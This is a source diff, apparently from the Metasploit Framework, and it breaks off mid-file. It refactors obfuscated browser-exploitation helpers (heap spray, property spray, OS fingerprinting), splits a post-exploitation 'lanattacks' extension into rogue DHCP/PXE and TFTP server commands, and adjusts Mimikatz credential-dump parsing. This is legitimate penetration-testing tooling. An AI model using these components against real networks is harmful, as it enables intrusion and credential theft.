-# Provides several javascript functions for determining the OS and browser versions of a client.
-#
-# getVersion():  returns an object with the following properties
-#	os_name      -  OS name, one of the Msf::OperatingSystems constants
-#	os_flavor    -  OS flavor as a string (e.g.: "XP", "2000")
-#	os_sp        -  OS service pack (e.g.: "SP2", will be empty on non-Windows)
-#	os_lang      -  OS language (e.g.: "en-us")
-#	ua_name      -  Client name, one of the Msf::HttpClients constants
-#	ua_version   -  Client version as a string (e.g.: "3.5.1", "6.0;SP2")
-#	arch         -  Architecture, one of the ARCH_* constants
-#
-# The following functions work on the version returned in obj.ua_version
-#
-# ua_ver_cmp(a, b): returns -1, 0, or 1 based on whether a < b, a == b, or a > b respectively
-# ua_ver_lt(a, b):  returns true if a < b
-# ua_ver_gt(a, b):  returns true if a > b
-# ua_ver_eq(a, b):  returns true if a == b
-#
-class JavascriptOSDetect < JSObfu
-
-  def initialize(custom_js = '', opts = {})
-    @js = custom_js
-    @js += ::File.read(::File.join(::File.dirname(__FILE__), "javascriptosdetect.js"))
-
-    super @js
-
-    return @js
-  end
-
-end
-end
-
-end
@@ -0,0 +1,6 @@
+# -*- coding: binary -*-
+
+require 'rex/exploitation/js/memory'
+require 'rex/exploitation/js/network'
+require 'rex/exploitation/js/utils'
+require 'rex/exploitation/js/detect'
@@ -0,0 +1,56 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'rex/text'
+require 'rex/exploitation/jsobfu'
+
+module Rex
+module Exploitation
+module Js
+
+
+class Detect
+
+  #
+  # Provides several javascript functions for determining the OS and browser versions of a client.
+  #
+  # getVersion():  returns an object with the following properties
+  # os_name      -  OS name, one of the Msf::OperatingSystems constants
+  # os_flavor    -  OS flavor as a string (e.g.: "XP", "2000")
+  # os_sp        -  OS service pack (e.g.: "SP2", will be empty on non-Windows)
+  # os_lang      -  OS language (e.g.: "en-us")
+  # ua_name      -  Client name, one of the Msf::HttpClients constants
+  # ua_version   -  Client version as a string (e.g.: "3.5.1", "6.0;SP2")
+  # arch         -  Architecture, one of the ARCH_* constants
+  #
+  # The following functions work on the version returned in obj.ua_version
+  #
+  # ua_ver_cmp(a, b): returns -1, 0, or 1 based on whether a < b, a == b, or a > b respectively
+  # ua_ver_lt(a, b):  returns true if a < b
+  # ua_ver_gt(a, b):  returns true if a > b
+  # ua_ver_eq(a, b):  returns true if a == b
+  #
+  def self.os(custom_js = '')
+    js  = custom_js
+    js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "os.js"))
+
+    Rex::Exploitation::JSObfu.new(js)
+  end
+
+
+  #
+  # Provides javascript functions to determine addon information.
+  #
+  # getMsOfficeVersion(): Returns the version for Microsoft Office
+  #
+  def self.addons(custom_js = '')
+    js  = custom_js
+    js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "addons.js"))
+
+    Rex::Exploitation::JSObfu.new(js)
+  end
+
+end
+end
+end
+end
@@ -0,0 +1,52 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Rex
+module Exploitation
+module Js
+
+#
+# Provides meomry manipulative functions in JavaScript
+#
+class Memory
+
+  def self.mstime_malloc
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "mstime_malloc.js"))
+    js = js.gsub(/W00TA/, Rex::Text.rand_text_hex(6))
+    js = js.gsub(/W00TB/, Rex::Text.rand_text_hex(5))
+
+    ::Rex::Exploitation::ObfuscateJS.new(js,
+      {
+        'Symbols' => {
+          'Variables' => %w{ buf eleId acTag }
+        }
+      }).obfuscate
+  end
+
+  def self.property_spray
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "property_spray.js"))
+
+    ::Rex::Exploitation::ObfuscateJS.new(js,
+      {
+        'Symbols' => {
+          'Variables' => %w{ sym_div_container data junk obj }
+        }
+      }).obfuscate
+  end
+
+  def self.heap_spray
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "memory", "heap_spray.js"))
+
+    ::Rex::Exploitation::ObfuscateJS.new(js,
+      {
+        'Symbols' => {
+          'Variables' => %w{ index heapSprayAddr_hi heapSprayAddr_lo retSlide heapBlockCnt }
+        }
+      }).obfuscate
+  end
+
+end
+end
+end
+end
@@ -0,0 +1,28 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+
+module Rex
+module Exploitation
+module Js
+
+#
+# Provides networking functions in JavaScript
+#
+class Network
+
+  def self.ajax_download
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "network", "ajax_download.js"))
+
+    ::Rex::Exploitation::ObfuscateJS.new(js,
+      {
+        'Symbols' => {
+          'Variables' => %w{ xmlHttp }
+        }
+      }).obfuscate
+  end
+
+end
+end
+end
+end
@@ -0,0 +1,33 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'rex/text'
+require 'rex/exploitation/jsobfu'
+
+module Rex
+module Exploitation
+module Js
+
+#
+# Javascript utilities
+#
+class Utils
+
+  def self.base64
+    js = ::File.read(::File.join(Msf::Config.data_directory, "js", "utils", "base64.js"))
+
+    opts = {
+      'Symbols' => {
+        'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
+          input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
+        'Methods'   => %w{ _utf8_encode _utf8_decode encode decode }
+      }
+    }
+
+    ::Rex::Exploitation::ObfuscateJS.new(js, opts).to_s
+  end
+
+end
+end
+end
+end
@@ -0,0 +1,239 @@
+require "rex/parser/nokogiri_doc_mixin"
+
+module Rex
+module Parser
+
+load_nokogiri && class Outpost24Document < Nokogiri::XML::SAX::Document
+
+  include NokogiriDocMixin
+
+  def start_element(name, attrs)
+    @state[:current_tag][name] = true
+    case name
+    when "description", "information"
+      return unless in_tag("detaillist")
+      return unless in_tag("detail")
+      record_text
+    when "detail"
+      return unless in_tag("detaillist")
+      record_vuln
+    when "detaillist"
+      record_vulns
+    when "host"
+      return unless in_tag("hostlist")
+      record_host
+    when "hostlist"
+      record_hosts
+    when "id"
+      return unless in_tag("detaillist")
+      return unless in_tag("detail")
+      return unless in_tag("cve")
+      record_text
+    when "name"
+      return unless in_tag("hostlist") || in_tag("detaillist")
+      return unless in_tag("host") || in_tag("detail")
+      record_text
+    when "platform"
+      return unless in_tag("hostlist")
+      return unless in_tag("host")
+      record_text
+    when "portinfo"
+      return unless in_tag("portlist")
+      return unless in_tag("portlist-host")
+      record_service
+    when "portlist"
+      record_services
+    when "portnumber", "protocol", "service"
+      return unless in_tag("portlist")
+      return unless in_tag("portlist-host")
+      return unless in_tag("portinfo")
+      record_text
+    when "report", "ip"
+      record_text
+    end
+  end
+
+  def end_element(name)
+    case name
+    when "description", "information"
+      return unless in_tag("detaillist")
+      return unless in_tag("detail")
+      collect_vuln_data(name)
+    when "detail"
+      return unless in_tag("detaillist")
+      collect_vuln
+    when "detaillist"
+      report_vulns
+    when "host"
+      return unless in_tag("hostlist")
+      collect_host
+    when "hostlist"
+      report_hosts
+    when "id"
+      return unless in_tag("detaillist")
+      return unless in_tag("detail")
+      return unless in_tag("cve")
+      collect_vuln_data(name)
+    when "ip"
+      collect_ip
+    when "name"
+      if in_tag("hostlist") && in_tag("host")
+        collect_host_data(name)
+      elsif in_tag("detaillist") && in_tag("detail")
+        collect_vuln_data(name)
+      end
+    when "platform"
+      return unless in_tag("hostlist")
+      return unless in_tag("host")
+      collect_host_data(name)
+    when "portinfo"
+      return unless in_tag("portlist")
+      return unless in_tag("portlist-host")
+      collect_service
+    when "portlist"
+      report_services
+    when "portnumber", "protocol", "service"
+      return unless in_tag("portlist")
+      return unless in_tag("portlist-host")
+      return unless in_tag("portinfo")
+      collect_service_data(name)
+    when "report"
+      collect_product
+    end
+    @state[:current_tag].delete(name)
+  end
+
+  def record_hosts
+    @report_data[:hosts] = []
+  end
+
+  def record_services
+    @report_data[:services] = []
+  end
+
+  def record_vulns
+    @report_data[:vulns] = []
+  end
+
+  def record_host
+    @host = {}
+  end
+
+  def record_service
+    @service = {}
+  end
+
+  def record_vuln
+    @vuln = {}
+    @refs = []
+  end
+
+  def record_text
+    @state[:has_text] = true
+  end
+
+  def collect_host
+    @host[:host] = @state[:host]
+    @host[:name] = @state[:hname]
+    @host[:os_name] = @state[:os_name]
+    @host[:info] = @state[:pinfo]
+    @report_data[:hosts] << @host
+  end
+
+  def collect_service
+    @service[:host] = @state[:host]
+    @service[:port] = @state[:port]
+    @service[:proto] = @state[:proto]
+    @service[:name] = @state[:sname]
+    @service[:info] = @state[:pinfo]
+    @report_data[:services] << @service
+  end
+
+  def collect_vuln
+    @vuln[:host] = @state[:host]
+    @vuln[:name] = @state[:vname]
+    @vuln[:info] = @state[:vinfo]
+    @vuln[:refs] = @refs
+    @report_data[:vulns] << @vuln
+  end
+
+  def collect_product
+    @state[:has_text] = false
+    @state[:pinfo] = @text.strip if @text
+    @text = nil
+  end
+
+  def collect_ip
+    @state[:has_text] = false
+    @state[:host] = @text.strip if @text
+    @text = nil
+  end
+
+  def collect_host_data(name)
+    @state[:has_text] = false
+    if name == "name"
+      @state[:hname] = @text.strip if @text
+    elsif name == "platform"
+      if @text
+        @state[:os_name] = @text.strip
+      else
+        @state[:os_name] = Msf::OperatingSystems::UNKNOWN
+      end
+    end
+    @text = nil
+  end
+
+  def collect_service_data(name)
+    @state[:has_text] = false
+    if name == "portnumber"
+      @state[:port] = @text.strip if @text
+    elsif name == "protocol"
+      @state[:proto] = @text.strip.downcase if @text
+    elsif name == "service"
+      @state[:sname] = @text.strip if @text
+    end
+    @text = nil
+  end
+
+  def collect_vuln_data(name)
+    @state[:has_text] = false
+    if name == "name"
+      @state[:vname] = @text.strip if @text
+    elsif name == "description"
+      @state[:vinfo] = @text.strip if @text
+    elsif name == "information"
+      @state[:vinfo] << " #{@text.strip if @text}"
+    elsif name == "id"
+      @state[:ref] = @text.strip if @text
+      @refs << normalize_ref("CVE", @state[:ref])
+    end
+    @text = nil
+  end
+
+  def report_hosts
+    block = @block
+    @report_data[:hosts].each do |h|
+      db.emit(:address, h[:host], &block) if block
+      db_report(:host, h)
+    end
+  end
+
+  def report_services
+    block = @block
+    @report_data[:services].each do |s|
+      db.emit(:service, "#{s[:host]}:#{s[:port]}/#{s[:proto]}", &block) if block
+      db_report(:service, s)
+    end
+  end
+
+  def report_vulns
+    block = @block
+    @report_data[:vulns].each do |v|
+      db.emit(:vuln, ["#{v[:name]} (#{v[:host]})", 1], &block) if block
+      db_report(:vuln, v)
+    end
+  end
+
+end
+end
+end
@@ -0,0 +1,78 @@
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/extensions/lanattacks/tlv'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Lanattacks
+module Dhcp
+
+###
+#
+# DHCP Server functionality
+#
+###
+class Dhcp
+
+  def initialize(client)
+    @client = client
+  end
+
+  def start
+    client.send_request(Packet.create_request('lanattacks_start_dhcp'))
+    true
+  end
+
+  def reset
+    client.send_request(Packet.create_request('lanattacks_reset_dhcp'))
+    true
+  end
+
+  def set_option(name, value)
+    request = Packet.create_request('lanattacks_set_dhcp_option')
+    request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name)
+    request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value)
+    client.send_request(request)
+    true
+  end
+
+  def load_options(datastore)
+    # TODO: change this so that all of the options are set in a single
+    # payload rather than firing off lots of calls separately
+    datastore.each do |name, value|
+      if Regexp.new('DHCPIPSTART|DHCPIPEND|NETMASK|ROUTER|DNSSERVER|BROADCAST|'+
+          'SERVEONCE|PXE|HOSTNAME|HOSTSTART|FILENAME|PXECONF|SRVHOST') =~ name
+        set_option(name, value)
+      end
+    end
+  end
+
+  def stop
+    client.send_request(Packet.create_request('lanattacks_stop_dhcp'))
+    true
+  end
+
+  def log
+    response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
+    entries = []
+    if( response.result == 0 )
+      log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
+      while log.length > 0
+        mac = log.slice!(0..5)
+        ip = log.slice!(0..3)
+        entries << {
+         :mac => mac,
+         :ip  => ip
+        }
+      end
+    end
+    entries
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end
@@ -2,6 +2,8 @@
 # -*- coding: binary -*-

 require 'rex/post/meterpreter/extensions/lanattacks/tlv'
+require 'rex/post/meterpreter/extensions/lanattacks/dhcp/dhcp'
+require 'rex/post/meterpreter/extensions/lanattacks/tftp/tftp'

 module Rex
 module Post
@@ -16,84 +18,27 @@ module Lanattacks
 ###
 class Lanattacks < Extension

+  #
+  # Initializes an instance of the lanattacks extension.
+  #
  def initialize(client)
    super(client, 'lanattacks')

+    # Alias the following things on the client object so that they
+    # can be directly referenced
    client.register_extension_aliases(
-      [{
+      [
+        {
          'name' => 'lanattacks',
-          'ext'  => self
-       },])
+          'ext'  => ObjectAliases.new(
+            {
+              'dhcp' => Rex::Post::Meterpreter::Extensions::Lanattacks::Dhcp::Dhcp.new(client),
+              'tftp' => Rex::Post::Meterpreter::Extensions::Lanattacks::Tftp::Tftp.new(client)
+            }),
+        }
+      ])
  end

-  def start_dhcp
-    client.send_request(Packet.create_request('lanattacks_start_dhcp'))
-    true
-  end
-
-  def reset_dhcp
-    client.send_request(Packet.create_request('lanattacks_reset_dhcp'))
-    true
-  end
-
-  def set_dhcp_option(name, value)
-    request = Packet.create_request('lanattacks_set_dhcp_option')
-    request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, name)
-    request.add_tlv(TLV_TYPE_LANATTACKS_OPTION, value)
-    client.send_request(request)
-    true
-  end
-
-  def load_dhcp_options(datastore)
-    datastore.each do |name, value|
-      if Regexp.new('DHCPIPSTART|DHCPIPEND|NETMASK|ROUTER|DNSSERVER|BROADCAST|'+
-          'SERVEONCE|PXE|HOSTNAME|HOSTSTART|FILENAME|PXECONF|SRVHOST') =~ name
-        set_dhcp_option(name,value)
-      end
-    end
-  end
-
-  def stop_dhcp
-    client.send_request(Packet.create_request('lanattacks_stop_dhcp'))
-    true
-  end
-
-  def dhcp_log
-    response = client.send_request(Packet.create_request('lanattacks_dhcp_log'))
-    entries = []
-    if( response.result == 0 )
-      log = response.get_tlv_value( TLV_TYPE_LANATTACKS_RAW )
-      while log.length > 0
-        mac = log.slice!(0..5)
-        ip = log.slice!(0..3)
-        entries << [ mac, ip ]
-      end
-    end
-    entries
-  end
-
-  def start_tftp
-    client.send_request(Packet.create_request('lanattacks_start_tftp'))
-    true
-  end
-
-  def reset_tftp
-    client.send_request(Packet.create_request('lanattacks_reset_tftp'))
-    true
-  end
-
-  def add_tftp_file(filename, data)
-    request = Packet.create_request('lanattacks_add_tftp_file')
-    request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename)
-    request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it
-    client.send_request(request)
-    true
-  end
-
-  def stop_tftp
-    client.send_request(Packet.create_request('lanattacks_stop_tftp'))
-    true
-  end
 end

 end; end; end; end; end
@@ -0,0 +1,49 @@
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/extensions/lanattacks/tlv'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Lanattacks
+module Tftp
+
+###
+#
+# TFTP Server functionality
+#
+###
+class Tftp
+
+  def initialize(client)
+    @client = client
+  end
+
+  def start
+    client.send_request(Packet.create_request('lanattacks_start_tftp'))
+    true
+  end
+
+  def reset
+    client.send_request(Packet.create_request('lanattacks_reset_tftp'))
+    true
+  end
+
+  def add_file(filename, data)
+    request = Packet.create_request('lanattacks_add_tftp_file')
+    request.add_tlv(TLV_TYPE_LANATTACKS_OPTION_NAME, filename)
+    request.add_tlv(TLV_TYPE_LANATTACKS_RAW, data, false, true) #compress it
+    client.send_request(request)
+    true
+  end
+
+  def stop
+    client.send_request(Packet.create_request('lanattacks_stop_tftp'))
+    true
+  end
+
+  attr_accessor :client
+end
+
+end; end; end; end; end; end
@@ -5,10 +5,10 @@ module Meterpreter
 module Extensions
 module Lanattacks

-TLV_TYPE_LANATTACKS_OPTION = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 1)
-TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING| (TLV_EXTENSIONS + 2)
-TLV_TYPE_LANATTACKS_UINT = TLV_META_TYPE_UINT| (TLV_EXTENSIONS + 3)
-TLV_TYPE_LANATTACKS_RAW = TLV_META_TYPE_RAW| (TLV_EXTENSIONS + 4)
+TLV_TYPE_LANATTACKS_OPTION      = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 1)
+TLV_TYPE_LANATTACKS_OPTION_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
+TLV_TYPE_LANATTACKS_UINT        = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 3)
+TLV_TYPE_LANATTACKS_RAW         = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 4)

 end
 end
@@ -34,14 +34,18 @@ class Mimikatz < Extension
      ])
  end

-  def send_custom_command(function, args=[])
+  def send_custom_command_raw(function, args=[])
    request = Packet.create_request('mimikatz_custom_command')
    request.add_tlv(TLV_TYPE_MIMIKATZ_FUNCTION, function)
    args.each do |a|
      request.add_tlv(TLV_TYPE_MIMIKATZ_ARGUMENT, a)
    end
    response = client.send_request(request)
-    return Rex::Text.to_ascii(response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT))
+    return response.get_tlv_value(TLV_TYPE_MIMIKATZ_RESULT)
+  end
+
+  def send_custom_command(function, args=[])
+    return Rex::Text.to_ascii(send_custom_command_raw(function, args))
  end

  def parse_creds_result(result)
@@ -63,11 +67,18 @@ class Mimikatz < Extension
  def parse_ssp_result(result)
    details = CSV.parse(result)
    accounts = []
+
+    return accounts unless details
    details.each do |acc|
+      next unless acc.length == 5
      ssps = acc[4].split(' }')
+      next unless ssps
      ssps.each do |ssp|
+        next unless ssp
        s_acc = ssp.split(' ; ')
+        next unless s_acc
        user = s_acc[0].split('{ ')[1]
+        next unless user
        account = {
          :authid => acc[0],
          :package => acc[1],
@@ -231,6 +231,24 @@ class Config
    return true
  end

+  #
+  # Get's the current proxy configuration
+  #
+  def get_proxy_config()
+    request = Packet.create_request('stdapi_net_config_get_proxy')
+
+    response = client.send_request(request)
+
+    proxy_config = {
+      :autodetect    => response.get_tlv_value(TLV_TYPE_PROXY_CFG_AUTODETECT),
+      :autoconfigurl => response.get_tlv_value(TLV_TYPE_PROXY_CFG_AUTOCONFIGURL),
+      :proxy         => response.get_tlv_value(TLV_TYPE_PROXY_CFG_PROXY),
+      :proxybypass   => response.get_tlv_value(TLV_TYPE_PROXY_CFG_PROXYBYPASS)
+    }
+
+    return proxy_config
+  end
+
 protected

  attr_accessor :client # :nodoc:
@@ -69,6 +69,12 @@ TLV_TYPE_ROUTE_METRIC       = TLV_META_TYPE_UINT    | 1443
 # Resolve
 TLV_TYPE_ADDR_TYPE          = TLV_META_TYPE_UINT    | 1444

+# Proxy configuration
+TLV_TYPE_PROXY_CFG_AUTODETECT    = TLV_META_TYPE_BOOL    | 1445
+TLV_TYPE_PROXY_CFG_AUTOCONFIGURL = TLV_META_TYPE_STRING  | 1446
+TLV_TYPE_PROXY_CFG_PROXY         = TLV_META_TYPE_STRING  | 1447
+TLV_TYPE_PROXY_CFG_PROXYBYPASS   = TLV_META_TYPE_STRING  | 1448
+
 # Socket
 TLV_TYPE_PEER_HOST          = TLV_META_TYPE_STRING  | 1500
 TLV_TYPE_PEER_PORT          = TLV_META_TYPE_UINT    | 1501
@@ -0,0 +1,60 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Lanattacks extension.
+#
+###
+class Console::CommandDispatcher::Lanattacks
+
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/dhcp'
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/lanattacks/tftp'
+
+  Klass = Console::CommandDispatcher::Lanattacks
+
+  Dispatchers =
+    [
+      Klass::Dhcp,
+      Klass::Tftp
+    ]
+
+  include Console::CommandDispatcher
+
+  #
+  # Initializes an instance of the lanattacks command interaction.
+  #
+  def initialize(shell)
+    super
+
+    Dispatchers.each { |d|
+      shell.enstack_dispatcher(d)
+    }
+  end
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    {
+    }
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    "Lanattacks extension"
+  end
+
+end
+
+end
+end
+end
+end
@@ -0,0 +1,254 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# The DHCP portion of the lanattacks extension.
+#
+###
+class Console::CommandDispatcher::Lanattacks::Dhcp
+
+  Klass = Console::CommandDispatcher::Lanattacks::Dhcp
+
+  include Console::CommandDispatcher
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      "dhcp_start"        => "Start the DHCP server",
+      "dhcp_stop"         => "Stop the DHCP server",
+      "dhcp_reset"        => "Reset the DHCP server",
+      "dhcp_set_option"   => "Set a DHCP server option",
+      "dhcp_load_options" => "Load DHCP optionis from a datastore",
+      "dhcp_log"          => "Log DHCP server activity"
+    }
+
+    reqs = {
+      "dhcp_start"        => [ "lanattacks_start_dhcp" ],
+      "dhcp_stop"         => [ "lanattacks_stop_dhcp" ],
+      "dhcp_reset"        => [ "lanattacks_reset_dhcp" ],
+      "dhcp_set_option"   => [ "lanattacks_set_dhcp_option" ],
+      "dhcp_load_options" => [ "lanattacks_set_dhcp_option" ],
+      "dhcp_log"          => [ "lanattacks_dhcp_log" ]
+    }
+
+    all.delete_if do |cmd, desc|
+      del = false
+      reqs[cmd].each do |req|
+        next if client.commands.include? req
+        del = true
+        break
+      end
+
+      del
+    end
+
+    all
+  end
+
+  #
+  # Name for this dispatcher.
+  #
+  def name
+    "Lanattacks: DHCP"
+  end
+
+  @@dhcp_start_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_dhcp_start_usage
+    print("dhcp_start [-h]\n\n" +
+          "Starts a DHCP server in the current Meterpreter session.\n" +
+          @@dhcp_start_opts.usage + "\n")
+  end
+
+  def cmd_dhcp_start(*args)
+    @@dhcp_start_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_dhcp_start_usage
+        return true
+      end
+    }
+
+    print_status( "Starting DHCP server ...")
+    client.lanattacks.dhcp.start
+    print_good( "DHCP server startd.")
+  end
+
+  @@dhcp_stop_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_dhcp_stop_usage
+    print("dhcp_stop [-h]\n\n" +
+          "Stops the currently running DHCP server.\n" +
+          @@dhcp_stop_opts.usage + "\n")
+  end
+
+  def cmd_dhcp_stop(*args)
+    @@dhcp_stop_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_dhcp_stop_usage
+        return true
+      end
+    }
+
+    print_status( "Stopping DHCP server ...")
+    client.lanattacks.dhcp.stop
+    print_good( "DHCP server stopped.")
+  end
+
+  @@dhcp_reset_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_dhcp_reset_usage
+    print("dhcp_reset [-h]\n\n" +
+          "Resets the currently running DHCP server.\n" +
+          @@dhcp_reset_opts.usage + "\n")
+  end
+
+  def cmd_dhcp_reset(*args)
+    @@dhcp_reset_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_dhcp_reset_usage
+        return true
+      end
+    }
+
+    print_status( "Resetting DHCP server ...")
+    client.lanattacks.dhcp.reset
+    print_good( "DHCP server reset.")
+  end
+
+  @@dhcp_set_option_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  @@dhcp_set_option_valid_options = [
+    "BROADCAST", "DHCPIPEND", "DHCPIPSTART", "DNSSERVER",
+    "FILENAME", "HOSTNAME", "HOSTSTART", "NETMASK",
+    "PXE", "PXECONF", "ROUTER", "SERVEONCE", "SRVHOST"
+  ]
+
+  def print_dhcp_set_option_usage
+    print("dhcp_set_option <name> <value> [-h]\n\n" +
+          "Set a DHCP server option.\n\n" +
+          "Valid names are:\n" +
+          @@dhcp_set_option_valid_options.map {|o| "  - #{o}\n" }.join('') +
+          @@dhcp_set_option_opts.usage + "\n")
+  end
+
+  def cmd_dhcp_set_option(*args)
+    @@dhcp_set_option_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_dhcp_set_option_usage
+        return true
+      end
+    }
+
+    if args.length < 2
+      print_dhcp_set_option_usage
+      return true
+    end
+
+
+    name = args.shift.upcase
+    value = args.shift
+
+    if not @@dhcp_set_option_valid_options.include? name
+      print_error( "Invalid option name '#{name}'." )
+      return true
+    end
+
+    client.lanattacks.dhcp.set_option(name, value)
+  end
+
+  @@dhcp_load_options_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_dhcp_load_options_usage
+    print("dhcp_load_options <datastore> [-h]\n\n" +
+          "Load settings from a datstore to the active DHCP server.\n\n" +
+          "The datastore must be a hash of name/value pairs.\n" +
+          "Valid names are:\n" +
+          @@dhcp_set_option_valid_options.map {|o| "  - #{o}\n" }.join('') +
+          @@dhcp_set_option_opts.usage + "\n")
+  end
+
+  def cmd_dhcp_load_options(*args)
+    @@dhcp_set_option_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_dhcp_set_option_usage
+        return true
+      end
+    }
+
+    if args.length < 1
+      print_dhcp_load_options_usage
+      return true
+    end
+
+    datastore = args.shift
+
+    if not datastore.is_a?(Hash)
+      print_dhcp_load_options_usage
+      return true
+    end
+
+    client.lanattacks.dhcp.load_options(datastore)
+  end
+
+  @@dhcp_log_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_dhcp_log_usage
+    print("dhcp_log [-h]\n\n" +
+          "Logs the DHCP operations captured by the DHCP server.\n" +
+          @@dhcp_log_opts.usage + "\n")
+  end
+
+  def cmd_dhcp_log(*args)
+    @@dhcp_log_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_dhcp_log_usage
+        return true
+      end
+    }
+
+    log = client.lanattacks.dhcp.log
+
+    table = Rex::Ui::Text::Table.new(
+      'Header'    => 'DHCP Server Log',
+      'Indent'    => 0,
+      'SortIndex' => 0,
+      'Columns'   => [ 'MAC Address', 'IP Address' ]
+    )
+
+    log.each { |l|
+      table << [ l[:mac], l[:ip] ]
+    }
+
+    print_line
+    print_line( table.to_s )
+    print_line( "Total log entries: #{log.length}" )
+    print_line
+  end
+
+end
+
+end
+end
+end
+end
+
@@ -0,0 +1,159 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# The TFTP portion of the lanattacks extension.
+#
+###
+class Console::CommandDispatcher::Lanattacks::Tftp
+
+  Klass = Console::CommandDispatcher::Lanattacks::Tftp
+
+  include Console::CommandDispatcher
+
+  #
+  # List of supported commands.
+  #
+  def commands
+    all = {
+      "tftp_start"    => "Start the TFTP server",
+      "tftp_stop"     => "Stop the TFTP server",
+      "tftp_reset"    => "Reset the TFTP server",
+      "tftp_add_file" => "Add a file to the TFTP server"
+    }
+
+    reqs = {
+      "tftp_start"    => [ "lanattacks_start_tftp" ],
+      "tftp_stop"     => [ "lanattacks_stop_tftp" ],
+      "tftp_reset"    => [ "lanattacks_reset_tftp" ],
+      "tftp_add_file" => [ "lanattacks_add_tftp_file" ],
+    }
+
+    all.delete_if do |cmd, desc|
+      del = false
+      reqs[cmd].each do |req|
+        next if client.commands.include? req
+        del = true
+        break
+      end
+
+      del
+    end
+
+    all
+  end
+
+  #
+  # Name for this dispatcher.
+  #
+  def name
+    "Lanattacks: TFTP"
+  end
+
+  @@tftp_start_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_tftp_start_usage
+    print("tftp_start [-h]\n\n" +
+          "Starts a TFTP server in the current Meterpreter session.\n" +
+          @@tftp_start_opts.usage + "\n")
+  end
+
+  def cmd_tftp_start(*args)
+    @@tftp_start_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_tftp_start_usage
+        return true
+      end
+    }
+
+    print_status( "Starting TFTP server ..." )
+    client.lanattacks.tftp.start
+    print_good( "TFTP server startd." )
+  end
+
+  @@tftp_stop_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_tftp_stop_usage
+    print("tftp_stop [-h]\n\n" +
+          "Stops the currently running TFTP server.\n" +
+          @@tftp_stop_opts.usage + "\n")
+  end
+
+  def cmd_tftp_stop(*args)
+    @@tftp_stop_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_tftp_stop_usage
+        return true
+      end
+    }
+
+    print_status( "Stopping TFTP server ..." )
+    client.lanattacks.tftp.stop
+    print_good( "TFTP server stopped." )
+  end
+
+  @@tftp_reset_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_tftp_reset_usage
+    print("tftp_reset [-h]\n\n" +
+          "Resets the currently running TFTP server.\n" +
+          @@tftp_reset_opts.usage + "\n")
+  end
+
+  def cmd_tftp_reset(*args)
+    @@tftp_reset_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-h'
+        print_tftp_reset_usage
+        return true
+      end
+    }
+
+    print_status( "Resetting TFTP server ..." )
+    client.lanattacks.tftp.reset
+    print_good( "TFTP server reset." )
+  end
+
+  @@tftp_add_file_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help banner." ])
+
+  def print_tftp_add_file_usage
